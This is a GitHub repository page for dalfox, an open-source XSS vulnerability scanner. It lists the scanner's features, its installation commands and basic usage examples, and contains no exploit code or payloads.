Skip to content

hahwul/dalfox

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2,591 Commits
.github
.github
Β 
Β 
aur
aur
Β 
Β 
docs
docs
Β 
Β 
samples
samples
Β 
Β 
scripts
scripts
Β 
Β 
skills/dalfox
skills/dalfox
Β 
Β 
snap
snap
Β 
Β 
src
src
Β 
Β 
tests
tests
Β 
Β 
.gitignore
.gitignore
Β 
Β 
AGENTS.md
AGENTS.md
Β 
Β 
CODE_OF_CONDUCT.md
CODE_OF_CONDUCT.md
Β 
Β 
CONTRIBUTING.md
CONTRIBUTING.md
Β 
Β 
Cargo.lock
Cargo.lock
Β 
Β 
Cargo.toml
Cargo.toml
Β 
Β 
Dockerfile
Dockerfile
Β 
Β 
LICENSE.txt
LICENSE.txt
Β 
Β 
README.md
README.md
Β 
Β 
SECURITY.md
SECURITY.md
Β 
Β 
flake.lock
flake.lock
Β 
Β 
flake.nix
flake.nix
Β 
Β 
justfile
justfile
Β 
Β 

Repository files navigation


dalfox

Looking for the Go (v2.x) version? Dalfox v3 is a complete rewrite in Rust. The Go codebase is preserved on the v2 branch and continues to receive security backports. See SECURITY.md for the support policy.

Dalfox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

Key features

  • Subcommands: scan (URL / file / pipe / raw-HTTP, auto-detected), server, payload, mcp
  • Discovery: Parameter analysis, static analysis, BAV testing, parameter mining
  • XSS Scanning: Reflected, Stored (SXSS), DOM-based, with optimization and DOM/AST verification
  • WAF: Fingerprinting with confidence scoring, bypass tracking, and tunable --waf-min-confidence
  • HTTP Options: Custom headers, cookies, methods, proxy, and more
  • Output: JSON/JSONL/Plain/Markdown/SARIF/TOML formats, silence mode, detailed reports
  • Extensibility: REST API, MCP stdio server, custom payloads, remote wordlists

And the various options required for the testing :D

Installation

Homebrew (macOS/Linux)

brew install dalfox

# https://formulae.brew.sh/formula/dalfox

Snapcraft (Ubuntu)

sudo snap install dalfox

Nixpkgs (NixOS)

A package is available for Nix or NixOS users. Keep in mind that the latest releases might only be present in the unstable channel.

nix-shell -p dalfox

Nix Flakes

For Nix users with flakes enabled:

# Run directly
nix run github:hahwul/dalfox -- scan https://example.com

# Install
nix profile install github:hahwul/dalfox

# Development environment
nix develop github:hahwul/dalfox

See Installation guide for details.

Usage

dalfox [mode] [target] [flags]
  • Single URL: dalfox url http://example.com -b https://callback
  • File Mode: dalfox file urls.txt --custom-payload mypayloads.txt
  • Pipeline: cat urls.txt | dalfox pipe -H "AuthToken: xxx"

Check the Usage and Running documents for more examples.

Contributing

if you want to contribute to this project, please see CONTRIBUTING.md and Pull-Request with cool your contents.

About the Name

As for the name, Dal(달) is the Korean word for "moon," while "Fox" stands for "Finder Of XSS" or 🦊

About

πŸŒ™πŸ¦Š Dalfox is a powerful open-source XSS scanner and utility focused on automation.

dalfox.hahwul.com

Topics

rust security xss bugbounty xss-scanner hacktoberfest devsecops bugbounty-tool

Resources

Readme

License

MIT license

Code of conduct

Code of conduct

Contributing

Contributing

Security policy

Security policy
Activity

Stars

5k stars

Watchers

55 watching

Forks

524 forks
Report repository

Releases 70

v2.13.0 Latest
May 7, 2026
+ 69 releases

Sponsor this project

 
Learn more about GitHub Sponsors

Packages

 
 
 

Contributors

Languages